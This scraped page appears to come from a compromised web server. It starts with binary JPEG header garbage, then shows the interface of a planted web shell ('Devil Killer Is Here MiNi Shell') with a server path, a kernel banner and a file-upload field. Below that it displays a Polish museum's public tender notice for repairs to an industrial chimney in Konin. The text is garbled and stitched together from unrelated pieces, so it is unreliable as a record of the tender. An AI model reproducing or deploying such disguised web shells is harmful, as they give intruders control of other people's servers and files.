JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240625/0038260501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> REMONT KONSERWATORSKI KOMINA PRZEMYSŁOWEGO <br/>W KONINIE PRZY ULICY MUZEALNEJ 6 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Okręgowe w Koninie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 311109012</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Muzealna 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Konin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-505</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL414 - Koniński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">63 2427599</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">muzeum@muzeum.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.muzeum.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> REMONT KONSERWATORSKI KOMINA PRZEMYSŁOWEGO <br/>W KONINIE PRZY ULICY MUZEALNEJ 6 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3cafea64-32f6-11ef-8a31-0e435a8a43bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00382605</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00109700/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Roboty budowlane zabepieczające, celem adaptacji dawnej gorzelni na cele muzealne - naprawa komina przemysłowego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3cafea64-32f6-11ef-8a31-0e435a8a43bc <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja Zamawiającego z Wykonawcami odbywa się elektronicznie przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl. W tym wszelkie oświadczenia, wnioski (inne niż oferta), zawiadomienia oraz informacje przekazywane są w przy użyciu:<br/>• Portalu e-Zamówienia, który dostępny jest pod adresem: https://ezamowienia.gov.pl/pl/, za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”).<br/>https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-3cafea64-32f6-11ef-8a31-0e435a8a43bc</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>- Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>- Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na platformę e-zamówienia.<br/>- Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik do niniejszej SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w e-Zamówienia klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1 Do spraw nieuregulowanych w SWZ mają zastosowanie przepisy Ustawy.<br/>2 Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>a)	Administratorem Pani/Pana danych osobowych jest Muzeum Okręgowe w Koninie,<br/>b)	inspektorem ochrony danych osobowych w Muzeum Okręgowym w Koninie, jest Monika Kubiak <br/>kontakt: rodo@muzeum.com.pl, lub pod numerem telefonu 63 242 75 30<br/>c)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: REMONT KONSERWATORSKI KOMINA PRZEMYSŁOWEGO W KONINIE PRZY ULICY MUZEALNEJ 6, prowadzonym w trybie podstawowym. <br/>d)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz 74 Ustawy z dnia 11 września 2019 r.– Prawo zamówień publicznych (Dz.U. z 2023 r. poz. 1605 ze zm.)<br/>e)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 Ustawy z dnia 11 września 2019 r.– Prawo zamówień publicznych (Dz.U. z 2023 r. poz. 1605 ze zm.) przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>f)	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp,<br/>g)	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>h)	Posiada Pani/Pan:<br/>1.	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>2.	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>3.	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>4.	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>i)	nie przysługuje Pani/Panu:<br/>1.	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2.	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>3.	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MOK.AD.ZP.261.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są: Prace konserwatorskie w zakresie komina przemysłowego w Koninie przy ulicy Muzealnej 6, a w tym: <br/><br/>Komin <br/><br/>1.	Rozbiórka górnej części komina o wysokości, a następnie odtworzenie końcowego odcinka komina z klasycznej cegły kominówki wykonywanej na zamówienie (dla potrzeb konserwacji zabytków) w wyspecjalizowanej cegielni. Wymiary lica cegły kominowej: 16x9 cm. Grubość cegły: 25cm. Odtwarzana część komin będzie murowana na zaprawie wapiennej z dodatkiem trasu (dla poprawienia właściwości hydraulicznych). <br/>2.	„Zszycie” rys prętami ze stali nierdzewnej, np. w technologii HELIBAR. <br/>3.	Wymiana i ujednolicenie wszystkich klamer stalowych służących do wyjścia na koronę komina. <br/>4.	Wykonanie przykrycia głowicy komina z wentylacją, aby umożliwić jego przewietrzenie wraz z zabezpieczeniem wnętrza przed korozją atmosferyczną. <br/>5.	Wykonanie obróbek blacharskich przy przejściu komina przez przykrycie dachowe hali. <br/>6.	Wykonanie instalacji odgromowej komina. <br/><br/>Wątki ceglane z cegły kominówki <br/><br/>1.	Oczyszczenie powierzchni wątków ceglanych metodą strumieniowo – ścierną. W tym przypadku należy zwrócić szczególną uwagę na poziom ciśnienia, aby cegieł nie przeczyścić i nie uszkodzić lica. Chodzi tylko o usunięcie zanieczyszczeń i przemalowań. Najpierw należy wykonać próby efektu czyszczenia w zależności od zastosowanego ścierniwa (drobny, selekcjonowany piasek ST-ZB – WYMAGANIA OGÓLNE str. 5/34 kwarcowy, elektrokorund, suchy lód itp.) Podczas procesu czyszczenia należy bezwzględnie zabezpieczyć otoczenie plandekami, aby zminimalizować pylenie. Po zabiegu czyszczenia resztki ścierniwa należy dokładnie usunąć z powierzchni metalu metodą przedmuchiwania sprężonym powietrzem. Część ścierniwa można także usunąć odkurzaczem przemysłowym. Tą samą metodą należy oczyścić elementy metalowe widoczne na elewacji. <br/>2.	Wykucie zupełnie zniszczonych cegieł i zastąpienie ich nowymi o identycznej formie i stopniu wypału. Cegły należy murować na zaprawie z dodatkiem trasu. <br/>3.	Uzupełnienie mniejszych ubytków cegieł (uzupełnienie o charakterze technicznym) zaprawą mineralną z dodatkiem trasu, barwioną w masie. <br/>4.	Uzupełnienie ubytków zaprawy w spoinach zaprawą z dodatkiem trasu. <br/>5.	Hydrofobizacja, czyli impregnacja zabezpieczająca przez nadmiernym wnikaniem wody kroplistej w strukturę materiału ceglanego. Można zastosować preparat wodorozcieńczalny lub rozpuszczalnikowy. W tym drugim przypadku należy pamiętać, że mur ceglany powinien być suchy, a pogoda do przeprowadzenia zabiegu bezdeszczowa. Impregnację należy przeprowadzić metodą natryskową lub przez nasączanie pędzlem. <br/><br/>Opaski stalowe <br/><br/>1.	Oczyszczenie powierzchni wszystkich elementów stalowych z nadmiaru produktów korozji uważając, aby nie uzyskać efektu „przeczyszczenia” do gołej stali. Zaleca się zastosowanie metody strumieniowo – ściernej, przy czym należy najpierw wykonać próby efektu czyszczenia w zależności od zastosowanego ścierniwa (drobny, selekcjonowany piasek kwarcowy, elektrokorund, mikrokulki szklane, śrut staliwny kulisty itp.) Podczas procesu czyszczenia należy bezwzględnie zabezpieczyć konstrukcję plandekami, aby zminimalizować pylenie do otoczenia. Po zabiegu czyszczenia resztki ścierniwa należy dokładnie usunąć z powierzchni metalu metodą przedmuchiwania sprężonym powietrzem. Część ścierniwa można także usunąć odkurzaczem przemysłowym. <br/>2.	Elementy przeznaczone do pomalowania na nowo należy pomalować elastyczną farbą do metalu o wysokiej odporności na UV i czynniki atmosferyczne o spoiwie z zawartością kopolimeru styrenowo – akrylowego oraz fosforanu cynku, wodorozcieńczalną. Należy zastosować kolor w zależności od malowanego elementu. <br/>3.	Wymiana wszystkich śrub, podkładek i nakładek przy obejmach.<br/><br/>Szczegółowy zakres zgodnie z załączoną dokumentacją, w szczególności Specyfikacją Techniczną Wykonania i Odbioru Robót oraz Projektem Architektoniczno-Budowlanym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">92500000-6 - Usługi świadczone przez biblioteki, archiwa, muzea i inne usługi kulturalne</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45262100-2 - Roboty przy wznoszeniu rusztowań</p> <p class="mb-0">92522200-8 - Usługi ochrony budynków historycznych</p> <p class="mb-0">45262521-9 - Roboty murarskie w zakresie fasad</p> <p class="mb-0">45262522-6 - Roboty murarskie</p> <p class="mb-0">45262350-9 - Betonowanie bez zbrojenia</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45262400-5 - Wnoszenie konstrukcji ze stali konstrukcyjnej</p> <p class="mb-0">45261100-5 - Wykonywanie konstrukcji dachowych</p> <p class="mb-0">45261200-6 - Wykonywanie pokryć dachowych i malowanie dachów</p> <p class="mb-0">45262000-1 - Specjalne roboty budowlane inne niż dachowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający będzie oceniał oferty według następującego kryterium:<br/>Kryterium nr 1. Cena – 60 %	<br/>Kryterium nr 2 Okres gwarancji	- 40%<br/> 2. Punkty przyznawane za podane w pkt. 1. kryteria będą liczone według następujących wzorów:<br/>Nr kryterium 1 - (Cmin/Cof) * 100 * waga, gdzie:<br/>- Cmin - najniższa cena spośród wszystkich ofert<br/>- Cof - cena podana w ofercie<br/>Nr kryterium 2	- (Ogof/Ogmax) * 100 * waga, gdzie:<br/>Ogof – okres gwarancji oferty badanej; Ogmax – najdłuższy okres gwarancji<br/>Minimalny okres gwarancji punktowany przez Zamawiającego – 36 miesięcy<br/>Maksymalny okres gwarancji punktowany przez Zamawiającego – 60 miesięcy <br/>UWAGA! <br/>Jeżeli Wykonawca nie poda okresu gwarancji w ofercie, Zamawiający przyjmie, że Wykonawca oferuje minimalny okres gwarancji, tj. 36 miesięcy<br/>3. Oferta złożona przez wykonawcę może otrzymać 100 pkt.<br/>4. W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez wykonawcę wyjaśnień treści złożonych przez niego ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zdolność do występowania w obrocie gospodarczym <br/>Określenie warunku: Zamawiający nie określa szczegółowego warunku w tym zakresie. <br/>2. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów <br/>Określenie warunku: Zamawiający nie określa szczegółowego warunku w tym zakresie. <br/>3. Sytuacja finansowa lub ekonomiczna <br/>Określenie warunku: Zamawiający nie określa szczegółowego warunku w tym zakresie.<br/>4. Zdolność techniczna lub zawodowa <br/>Określenie warunku: <br/>Wykonawca musi wykazać, że wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) – co najmniej jedną robotę budowlaną o wartości co najmniej 500.000,00 zł brutto polegającą na remoncie ceglanego obiektu wpisanego do rejestru zabytków. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>•	oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Ustawy według wzoru stanowiącego ZAŁĄCZNIK NR 4 do SWZ <br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ww. oświadczenie składa każdy z Wykonawców występujących wspólnie.<br/>W przypadku podmiotu, na którego zdolnościach lub sytuacji Wykonawca polega na zasadach określonych w art. 118 ustawy Pzp, Wykonawca składa ww. oświadczenie każdego z tych podmiotów.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>•	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, obejmujących roboty budowlane wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. - według wzoru stanowiącego ZAŁĄCZNIK NR 5 do SWZ</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest wnieść wadium w wysokości: <br/>5.000,00 zł (słownie: pięć tysięcy złotych 00/100)<br/>1. Wadium należy wnieść przed upływem terminu 